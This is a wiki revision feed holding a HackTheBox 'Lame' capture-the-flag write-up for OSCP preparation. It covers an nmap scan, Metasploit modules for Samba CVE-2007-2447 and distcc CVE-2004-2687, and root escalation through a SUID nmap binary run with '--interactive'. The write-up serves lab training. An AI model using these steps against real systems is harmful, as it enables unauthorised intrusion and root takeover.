https://book.ghanim.no/index.php?action=history&feed=atom&title=Write-ups%2FHTB%2FLame
Write-ups/HTB/Lame - Revision history
2026-04-21T15:10:31Z
Revision history for this page on the wiki
MediaWiki 1.45.1
https://book.ghanim.no/index.php?title=Write-ups/HTB/Lame&diff=1171&oldid=prev
imported>Aghanim at 20:44, 3 January 2022
2022-01-03T20:44:05Z
<p></p>
<p><b>New page</b></p><div>{{Infobox WriteUp<br />
| name = Lame<br />
| platform = HackTheBox<br />
| os = Linux<br />
| difficulty = Easy<br />
| techniques = Samba, distcc<br />
}}<br />
<br />
[[File:2022-01-image-75.png|thumb]]<br />
<br />
<br />
This is the first box for my OSCP preparation. This is a pretty straight forward box, where there are multiple vulnerabilites that can be used, as well as some privilege escalation vectors. I'll look at two different vulnerabilites in this writeup. Even though metasploit is only allowed once on the OSCP exam, I will strictly use metasploit in this writeup as a warmup. For further boxes I will refrain from using metasploit.<br />
<br />
<br />
----<br />
<br />
<br />
== Enumeration ==<br />
<br />
<br />
As always I'll start with the enumeration using NMAP.<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
┌─[root@parrotos]─[/home/aghanim/Desktop/HTB/lame]<br />
└──╼ #nmap -sV -sC -p- --min-rate 10000 10.10.10.3 -oN nmap.result<br />
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-03 19:13 GMT<br />
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan<br />
SYN Stealth Scan Timing: About 50.00% done; ETC: 19:15 (0:00:51 remaining)<br />
Nmap scan report for 10.10.10.3<br />
Host is up (0.082s latency).<br />
Not shown: 65530 filtered tcp ports (no-response)<br />
PORT STATE SERVICE VERSION<br />
21/tcp open ftp vsftpd 2.3.4<br />
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)<br />
| ftp-syst:<br />
| STAT:<br />
| FTP server status:<br />
| Connected to 10.10.14.11<br />
| Logged in as ftp<br />
| TYPE: ASCII<br />
| No session bandwidth limit<br />
| Session timeout in seconds is 300<br />
| Control connection is plain text<br />
| Data connections will be plain text<br />
| vsFTPd 2.3.4 - secure, fast, stable<br />
|_End of status<br />
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)<br />
| ssh-hostkey:<br />
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)<br />
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)<br />
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)<br />
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)<br />
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))<br />
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel<br />
<br />
Host script results:<br />
|_clock-skew: mean: 2h32m23s, deviation: 3h32m11s, median: 2m20s<br />
| smb-security-mode:<br />
| account_used: guest<br />
| authentication_level: user<br />
| challenge_response: supported<br />
|_ message_signing: disabled (dangerous, but default)<br />
| smb-os-discovery:<br />
| OS: Unix (Samba 3.0.20-Debian)<br />
| Computer name: lame<br />
| NetBIOS computer name:<br />
| Domain name: hackthebox.gr<br />
| FQDN: lame.hackthebox.gr<br />
|_ System time: 2022-01-03T14:18:06-05:00<br />
|_smb2-time: Protocol negotiation failed (SMB2)<br />
<br />
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 156.59 seconds<br />
</syntaxhighlight><br />
<br />
<br />
There are some ports that run vulnerable services on them, such as '''VSFTPD 2.3.4''', '''smbd 3.0.20''' and '''distccd v1'''. I'll first look at smbd and then distccd.<br />
<br />
<br />
== Initial Acces - Alternative 1 ==<br />
<br />
<br />
=== CVE-2007-2447 ===<br />
<br />
<br />
Starting metasploit I'll use '''multi/samba/usermap_script''' with these options.<br />
<br />
<br />
[[File:2022-01-image-77.png|thumb]]<br />
<br />
<br />
Running the exploit you can see that I instantly get root shell, so no need for privilege escalation. This is however very rare.<br />
<br />
<br />
[[File:2022-01-image-76.png|thumb]]<br />
<br />
<br />
== Initial Access - Alternative 2 ==<br />
<br />
<br />
=== CVE-2004-2687 ===<br />
<br />
<br />
Here I'll also use metasploit '''multi/misc/distcc_exec '''with these options.<br />
<br />
<br />
[[File:2022-01-Pasted-image-20220103205853.png|thumb]]<br />
<br />
<br />
And running this exploit I'll get a shell.<br />
<br />
<br />
[[File:2022-01-Pasted-image-20220103210005.png|thumb]]<br />
<br />
<br />
== Root ==<br />
<br />
<br />
To get root access, I'll search for files with SUID bits.<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
daemon@lame:/tmp$ find / -type f -perm -04000 -ls 2>/dev/null<br />
find / -type f -perm -04000 -ls 2>/dev/null<br />
16466 68 -rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount<br />
16449 20 -rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount<br />
16398 28 -rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su<br />
16418 84 -rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount<br />
16427 32 -rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping<br />
16457 28 -rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6<br />
8370 68 -rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs<br />
304747 4 -rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script<br />
344359 112 -rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit<br />
344440 8 -rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X<br />
344958 12 -rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh<br />
344139 40 -rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd<br />
344317 16 -rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils<br />
344359 112 -rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo<br />
344959 12 -rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin<br />
344230 12 -rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping<br />
344231 40 -rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at<br />
344365 20 -rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp<br />
344429 28 -rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn<br />
344956 768 -rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap<br />
344441 24 -rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh<br />
344957 16 -rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp<br />
344771 32 -rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd<br />
344792 48 -rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr<br />
354632 16 -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd<br />
354626 268 -rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd<br />
369987 8 -rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin<br />
385106 12 -rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec<br />
386116 8 -rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device<br />
377149 168 -rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign<br />
371390 12 -rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown<br />
8415 16 -r-sr-xr-x 1 root root 14320 Nov 3 2020 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper<br />
16687 12 -r-sr-xr-x 1 root root 9532 Nov 3 2020 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper<br />
</syntaxhighlight><br />
<br />
<br />
Looking through the list, there is one interesting file in particular; '''nmap. '''Looking at GTFObins I can run the command <code>nmap --interactive </code>and retain root privilege.<br />
<br />
<br />
[[File:2022-01-Pasted-image-20220103210251.png|thumb]]<br />
<br />
[[Category:HackTheBox]]<br />
[[Category:Linux]]<br />
[[Category:Write-ups]]</div>
imported>Aghanim